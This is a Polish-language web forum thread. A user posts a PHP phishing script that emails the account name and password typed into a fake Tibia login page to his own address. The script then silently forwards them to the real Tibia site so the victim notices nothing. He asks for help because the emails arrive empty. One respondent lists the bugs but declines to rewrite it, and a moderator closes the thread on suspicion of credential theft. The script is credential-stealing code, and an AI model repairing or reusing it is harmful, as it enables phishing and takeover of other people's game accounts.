![]() |
![]() ![]() |
![]() |
![]()
|
|
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 20.11.2012 Ostrzeżenie: (0%) ![]() ![]() |
Tak jak wyzej, chodzi o to zeby z pola Account Name i Password wpisy dochodzily na e mial. Posiadam taki skrypt:
<?php $from_header = "From: Tibiapass@com.pl"; mail('lwk92@o2.pl',$_POST['msg']['ACCOUNTLOGIN_ACCOUNTNAME'],$_POST['msg']['ACCOUNTLOGIN_PASSWORD'], $from_header); echo ' <body> <form action="https://secure.tibia.com/account/?subtopic=accountmanagement" method="post" name="AccountLogin" > <INPUT TYPE=hidden NAME="ACCOUNTLOGIN_PASSWORD" VALUE="',$_POST['msg']['ACCOUNTLOGIN_PASSWORD'],'"> <INPUT TYPE=hidden NAME="ACCOUNTLOGIN_ACCOUNTNAME" VALUE="',$_POST['msg']['ACCOUNTLOGIN_ACCOUNTNAME'],'"> </form> <script type="text/javascript" language="JavaScript"> document.AccountLogin.submit(); </script> </body> '; ?> Emaile dochodza ale niestety puste!!!! Co musze zmienic w tym skrypcie aby wpisy z tych okienek zostaly wysylane na emaila? Prosze o pomoc albo inny skrypt php ! |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 2 958 Pomógł: 574 Dołączył: 23.09.2008 Skąd: wiesz, że tu jestem? Ostrzeżenie: (0%) ![]() ![]() |
1. Sprawdzić czy wysłano POST
2. Zamiast przecinków w value powinny być kropki 3. Skąd, żeś wytrzasnął $_POST['msg'] ? |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 20.11.2012 Ostrzeżenie: (0%) ![]() ![]() |
Skrypt nie jest moj ktos mi go kiedys podeslal, jak nalezy sprawdzic czy wyslano POST?
Najlepiej jakbys mogl zrobic poprawke tego co mam, mogoloby to okazac sie kluczowe. Ten post edytował lwk92 20.11.2012, 19:55:23 |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 2 958 Pomógł: 574 Dołączył: 23.09.2008 Skąd: wiesz, że tu jestem? Ostrzeżenie: (0%) ![]() ![]() |
Wujek google po wpisaniu "php sprawdzić czy wysłano POST" zwraca odpowiedź, tyczy się to również pozostałych punktów.
|
|
|
![]()
|
|
Grupa: Moderatorzy Postów: 6 072 Pomógł: 861 Dołączył: 10.12.2003 Skąd: Dąbrowa Górnicza ![]() |
Mam podejrzenia, że skrypt miałby służyć do kradzieży danych dostępowych do kont. Jeśli się mylę - proszę o informację na PW. Tymczasem jednak prewencyjnie zamykam.
|
|
|
![]() ![]() |
![]() |
Aktualny czas: 5.10.2025 - 11:03 |